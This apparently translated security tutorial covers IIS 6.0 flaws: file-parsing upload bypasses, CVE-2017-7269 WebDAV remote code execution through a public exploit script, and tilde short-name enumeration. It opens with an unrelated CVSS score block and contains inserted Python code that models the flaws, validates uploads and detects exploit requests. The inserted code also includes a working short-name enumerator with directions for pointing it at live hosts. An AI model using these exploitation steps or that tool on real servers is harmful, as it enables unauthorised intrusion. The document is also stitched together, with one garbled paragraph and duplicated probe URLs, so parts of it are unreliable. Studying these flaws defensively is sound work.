9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.971 High
EPSS
Percentile
99.7%
![](/Article/UploadPic/2018-11/20181128231052767.png)
I have been a lurker for a long time and noticed that there is still no good summary of middleware vulnerabilities. I have only recently started studying this area, so this post summarises a small part of the common middleware vulnerabilities for reference; the rest will follow in a later post. If anything here is wrong, corrections from the experts are welcome.
1. IIS file parsing vulnerability
The IIS file parsing vulnerability exists in two versions, one in IIS 6.0 and one in IIS 7.5. The IIS 7.5 case is usually explained in the same way as the IIS 6.0 one (in practice it depends on PHP CGI's cgi.fix_pathinfo handling rather than on IIS itself), and because the IIS 6.0 flaw is a plain logic error, only IIS 6.0 is analysed here. The points where IIS 7.5 differs will be covered in a supplement.
(1) Vulnerability principle
IIS 6.0 has a logic flaw when it maps a path containing special characters to a handler: a directory named test.asp causes every file inside it to be executed as ASP, and a file whose name ends in .asp;.jpg is executed as ASP because only the part of the name before the semicolon is matched against the script map. Both cases produce a file parsing vulnerability.
(2) Demonstration and exploitation
When an upload point restricts extensions but the site runs ASP on IIS 6.0, upload a file named test.asp;.jpg: it passes the extension check and is executed as ASP afterwards, as shown in Figure 1.1.
![](/Article/UploadPic/2018-11/20181128231052271.png)
Figure 1.1
When the application lets you create a directory and does not restrict the directory name, create one named test.asp and place the file you want executed inside it, for example iisstart.jpg; it is executed as ASP, as shown in Figure 1.2.
![](/Article/UploadPic/2018-11/20181128231052184.png)
Figure 1.2
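The two handler-selection quirks above, modelled in Python as an added example (this is not the article's code). iis6_executes_as_asp() reproduces the IIS 6.0 behaviour described in the principle section, naive_check() is the kind of extension-only check that the upload point performs, and check_upload()/check_new_directory() are an assumed allowlist design that closes both tricks. ASP_EXTS is the classic IIS 6.0 script map for asp.dll; SAFE_EXTS and SAFE_NAME are assumptions for the example.

```python
# Added example, not the article's code. Models the IIS 6.0 handler selection
# described above and contrasts a naive upload check with an allowlist one.
import posixpath
import re

ASP_EXTS = {".asp", ".asa", ".cer", ".cdx"}    # IIS 6.0 extensions served by asp.dll
SAFE_EXTS = {".jpg", ".jpeg", ".png", ".gif"}  # assumed allowlist for an image upload point
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}") # assumed: no dots, no ';', no path characters


def iis6_executes_as_asp(url_path: str) -> bool:
    """Model of how IIS 6.0 picks the handler for url_path.

    Quirk 1: the last path segment is matched against the script map only up to
             the first ';', so 'test.asp;.jpg' is handed to asp.dll.
    Quirk 2: if any parent directory is named *.asp, every file below it is run
             as ASP, so '/test.asp/iisstart.jpg' is executed too.
    """
    segments = [s for s in url_path.split("/") if s]
    if not segments:
        return False
    for directory in segments[:-1]:                              # quirk 2
        if posixpath.splitext(directory)[1].lower() in ASP_EXTS:
            return True
    name_seen_by_script_map = segments[-1].split(";", 1)[0]       # quirk 1
    return posixpath.splitext(name_seen_by_script_map)[1].lower() in ASP_EXTS


def naive_check(filename: str) -> bool:
    """The kind of check the article's upload point performs: only the final
    extension is inspected, so 'test.asp;.jpg' passes."""
    return posixpath.splitext(filename)[1].lower() in SAFE_EXTS


def check_upload(filename: str) -> tuple[bool, str]:
    """Allowlist validator: (True, name_to_store) or (False, reason).

    Both the extension and the base name are allowlisted and the stored name is
    rebuilt from them, so nothing the client sends (';', extra dots, path
    separators) reaches the file system.
    """
    base, ext = posixpath.splitext(posixpath.basename(filename.replace("\\", "/")))
    if ext.lower() not in SAFE_EXTS:
        return False, f"extension not allowed: {ext!r}"
    if not SAFE_NAME.fullmatch(base):
        return False, f"base name not allowed: {base!r}"
    return True, base + ext.lower()


def check_new_directory(name: str) -> tuple[bool, str]:
    """User-created directory names may not carry an extension at all, which
    closes the 'test.asp' directory trick."""
    if not SAFE_NAME.fullmatch(name):
        return False, f"directory name not allowed: {name!r}"
    return True, name


if __name__ == "__main__":
    for path in ("/upload/test.jpg", "/upload/test.asp;.jpg", "/upload/test.asp/iisstart.jpg"):
        print(f"{path:36} naive_check={naive_check(path.rsplit('/', 1)[-1])!s:5} "
              f"executed_as_asp={iis6_executes_as_asp(path)}")
    print(check_upload("test.asp;.jpg"), check_upload("photo.JPG"), check_new_directory("test.asp"))
```

The point of the pair is that naive_check() and iis6_executes_as_asp() disagree on test.asp;.jpg, which is exactly the gap the upload bypass lives in; the allowlist functions never let the client's characters through, so the disagreement cannot arise.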
2. IIS command execution vulnerability
The IIS 6.0 command execution vulnerability is CVE-2017-7269: when the WebDAV service is enabled, remote code execution is possible.
(1) Vulnerability principle
When IIS 6.0 processes a PROPFIND request, the WebDAV component (httpext.dll) does not check the length of the URL it is given before copying it into a fixed-size stack buffer while converting it to a virtual path in ScStoragePathFromUrl. An over-long URL in the If: header of the request therefore triggers a stack buffer overflow, which can be turned into remote code execution, as shown in Figure 2.1.
![](/Article/UploadPic/2018-11/20181128231052174.png)
Figure 2.1
(2) Demonstration and exploitation
An open-source exploit is available on GitHub: https://github.com/edwardz246003/IIS_exploit
Change the IP address in the script to the target's address, as shown in Figure 2.2.
![](/Article/UploadPic/2018-11/20181128231052963.png)
Figure 2.2
Run the script to attack the target machine, as shown in Figure 2.3.
![](/Article/UploadPic/2018-11/20181128231053587.png)
Figure 2.3
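Two checks a tester or defender wants around CVE-2017-7269, written here as an added example in Python (not the article's code and not taken from the exploit repository above): webdav_enabled() reads an OPTIONS response to tell whether WebDAV is exposed at all, and is_cve_2017_7269_attempt() flags a PROPFIND whose If: header carries an over-long <http://...> token, which is the field the overflow is triggered through. The 255-byte threshold is an assumed heuristic, and the sample messages are constructed, not captured traffic.

```python
# Added example, not the article's code. A WebDAV exposure check plus a simple
# detection rule for CVE-2017-7269 exploitation attempts, over constructed samples.
import re

IF_URL = re.compile(r"<(https?://[^>]*)>")
MAX_IF_URL_LEN = 255  # assumed threshold: benign If: tokens are short, the exploit's URLs are far longer


def parse_http(raw: str) -> tuple[str, dict[str, list[str]]]:
    """Split a raw HTTP message into (start line, headers). Header names are
    lower-cased and repeated headers are kept as a list."""
    head = raw.split("\r\n\r\n", 1)[0]
    start_line, *lines = head.split("\r\n")
    headers: dict[str, list[str]] = {}
    for line in lines:
        name, sep, value = line.partition(":")
        if sep:
            headers.setdefault(name.strip().lower(), []).append(value.strip())
    return start_line, headers


def webdav_enabled(options_response: str) -> bool:
    """True if an OPTIONS reply advertises WebDAV: a 'DAV:' compliance header or
    PROPFIND in 'Allow:'. Without WebDAV the vulnerable PROPFIND path is not reachable."""
    _, headers = parse_http(options_response)
    allowed = {m.strip().upper() for v in headers.get("allow", []) for m in v.split(",")}
    return "dav" in headers or "PROPFIND" in allowed


def is_cve_2017_7269_attempt(request: str) -> bool:
    """Flag a PROPFIND whose If: header contains a <http://...> token longer than
    MAX_IF_URL_LEN. A benign If: header holds a short resource URL and a lock
    token; the over-long URL is what overruns the buffer in ScStoragePathFromUrl."""
    start_line, headers = parse_http(request)
    if start_line.split(" ", 1)[0].upper() != "PROPFIND":
        return False
    return any(len(url) > MAX_IF_URL_LEN
               for value in headers.get("if", [])
               for url in IF_URL.findall(value))


# Constructed samples (not real captures).
OPTIONS_WITH_WEBDAV = ("HTTP/1.1 200 OK\r\nServer: Microsoft-IIS/6.0\r\nDAV: 1, 2\r\n"
                       "Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, "
                       "PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n\r\n")
OPTIONS_WITHOUT_WEBDAV = ("HTTP/1.1 200 OK\r\nServer: Microsoft-IIS/6.0\r\n"
                          "Allow: OPTIONS, TRACE, GET, HEAD, POST\r\n\r\n")
BENIGN_PROPFIND = ("PROPFIND /docs/report.txt HTTP/1.1\r\nHost: 10.10.10.132\r\nDepth: 0\r\n"
                   "If: <http://10.10.10.132/docs/report.txt> "
                   "(<opaquelocktoken:e71d4fae-5dec-22d6-fea5-00a0c91e6be4>)\r\n"
                   "Content-Length: 0\r\n\r\n")
MALICIOUS_PROPFIND = ("PROPFIND / HTTP/1.1\r\nHost: 10.10.10.132\r\nContent-Length: 0\r\n"
                      "If: <http://localhost/" + "a" * 300 + "> (Not <locktoken:write1>) "
                      "<http://localhost/" + "b" * 300 + ">\r\n\r\n")

if __name__ == "__main__":
    print("WebDAV exposed:", webdav_enabled(OPTIONS_WITH_WEBDAV), webdav_enabled(OPTIONS_WITHOUT_WEBDAV))
    print("benign flagged:", is_cve_2017_7269_attempt(BENIGN_PROPFIND))
    print("exploit flagged:", is_cve_2017_7269_attempt(MALICIOUS_PROPFIND))
```

Before running the exploit script against a lab target, sending a single OPTIONS / request and feeding the reply to webdav_enabled() tells you whether there is anything to hit; the detection function is the shape of rule a WAF or IDS would apply to the same traffic.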
3. IIS short file name
The IIS short file name vulnerability abuses the Windows 8.3 short name mechanism: by brute-forcing short names containing a tilde (~) you can guess admin paths and sensitive files and in some cases download them directly. The limitation is that only the first 6 characters of the long file name and the first 3 characters of the extension can be recovered, and two conditions must hold: the target runs IIS and .NET.
A vulnerability principles
The use of IIS short file name of the mechanism, that is, a compatible 16-bit MS-DOS program, Windows for a file name longer-compute a suffix after the file name length is greater than 9 files and folders generated corresponding to the windows 8.3 short file name. You can use this vulnerability to guess the solution of the background address, sensitive documents, etc. As shown in Figure 3. 1
![](/Article/UploadPic/2018-11/20181128231053697.png)
Figure 3.1
(2) Demonstration and exploitation
On a Windows Server 2003 virtual machine, create two folders, 12345678 and 123456789, and a file aaaaaa.asp under c:/Inetpub/wwwroot for comparison. On the host, open the VM's IP address in the browser and request
http://10.10.10.132/122*~1*/a.asp and http://10.10.10.132/123*~1*/a.asp; the two give different results, as shown in Figure 3.2 and Figure 3.3.
![](/Article/UploadPic/2018-11/20181128231053148.png)
Figure 3.2
![](/Article/UploadPic/2018-11/20181128231053198.png)
Figure 3.3
From the two figures, the response differs depending on whether the guessed prefix matches an existing short name, so the short name can be guessed one character at a time.
Then try http://10.10.10.132/aaaaaa~1/a.asp (guessing no extension, i.e. a folder, which returns normally) and http://10.10.10.132/aaaaaa~1/a.asp (guessing a file), as shown in Figure 3.4 and Figure 3.5.
![](/Article/UploadPic/2018-11/20181128231053399.png)
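The guessing that the figures above do by hand, automated as an added example (not the article's code). make_oracle() simulates the IIS 6.0 tilde oracle over a constructed wwwroot listing, answering 404 when a wildcard matches an existing short name and 400 otherwise, and enumerate_short_names() recovers the 6-character stems and 3-character extensions from it; it goes beyond the text in also handling ~2 collisions. short_name_parts() is a simplified version of the Windows 8.3 rule, and the listing and character set are assumptions for the example.

```python
# Added example, not the article's code: an offline model of the IIS 6.0 short
# name oracle and the character-by-character enumeration run against it.
from fnmatch import fnmatchcase
import string

CHARSET = string.ascii_lowercase + string.digits + "_-"  # assumed guessing alphabet
MAX_STEM, MAX_EXT = 6, 3                                 # what an 8.3 name can leak


def short_name_parts(long_name: str):
    """(6-char stem, 3-char extension) Windows would use for the 8.3 name, or
    None when long_name already fits 8.3 and therefore gets no short name.
    Simplified: spaces are dropped, only the last dot starts the extension, and
    the characters Windows rewrites to '_' are not modelled."""
    base, dot, ext = long_name.rpartition(".")
    if not dot:
        base, ext = long_name, ""
    base, ext = base.replace(" ", ""), ext.replace(" ", "")
    if len(base) <= 8 and len(ext) <= 3 and "." not in base and " " not in long_name:
        return None
    return base.replace(".", "")[:MAX_STEM].upper(), ext[:MAX_EXT].upper()


def make_oracle(listing):
    """Build the tilde names for listing (BACKUP~1, BACKUP~2, ... on collisions)
    and return a status(probe) function that answers the way IIS 6.0 on
    Windows Server 2003 does in Figures 3.2 and 3.3 (404 hit, 400 miss)."""
    counters, shorts = {}, []
    for name in listing:
        parts = short_name_parts(name)
        if parts is None:
            continue                      # nothing to leak for names that fit 8.3
        stem, ext = parts
        n = counters[parts] = counters.get(parts, 0) + 1
        shorts.append(f"{stem}~{n}" + (f".{ext}" if ext else ""))

    def status(probe: str) -> int:
        return 404 if any(fnmatchcase(s, probe.upper()) for s in shorts) else 400

    return status, shorts


def guess_stems(status, n, prefix=""):
    """Grow prefix one character at a time while '<prefix><c>*~n*' is a hit."""
    stems = []
    if prefix and status(f"{prefix}~{n}*") == 404:
        stems.append(prefix)
    if len(prefix) < MAX_STEM:
        for c in CHARSET:
            if status(f"{prefix}{c}*~{n}*") == 404:
                stems.extend(guess_stems(status, n, prefix + c))
    return stems


def guess_exts(status, n, stem, ext=""):
    """Same idea for the extension; '' means a directory or extension-less
    file, which the exact probe '<stem>~n' (no wildcard) confirms."""
    exts = []
    if status(f"{stem}~{n}" + (f".{ext}" if ext else "")) == 404:
        exts.append(f".{ext}" if ext else "")
    if len(ext) < MAX_EXT:
        for c in CHARSET:
            if status(f"{stem}~{n}.{ext}{c}*") == 404:
                exts.extend(guess_exts(status, n, stem, ext + c))
    return exts


def enumerate_short_names(status, max_tilde=2):
    """Every short name the oracle confirms, for ~1 .. ~max_tilde."""
    found = []
    for n in range(1, max_tilde + 1):
        for stem in guess_stems(status, n):
            found.extend(f"{stem}~{n}{ext}" for ext in guess_exts(status, n, stem))
    return found


# Constructed wwwroot listing; 12345678 fits 8.3 and so has no short name.
SAMPLE_LISTING = ["12345678", "123456789", "adminpanel.aspx", "web.config",
                  "backup_2018.zip", "backup_old.zip"]


def demo():
    """Run the enumeration against the constructed listing: (real, recovered)."""
    status, shorts = make_oracle(SAMPLE_LISTING)
    return sorted(shorts), sorted(s.upper() for s in enumerate_short_names(status))


if __name__ == "__main__":
    real, recovered = demo()
    print("real short names:", real)
    print("recovered       :", recovered)
```

Against a real IIS 6.0 host, replace status() with a function that sends GET /<probe>/a.asp (the request form used in Figures 3.2 and 3.3) and returns the HTTP status code; the enumeration logic stays the same. Note that with the probe forms used here, 12345678 is never reported, because a name that already fits 8.3 has no short name to leak.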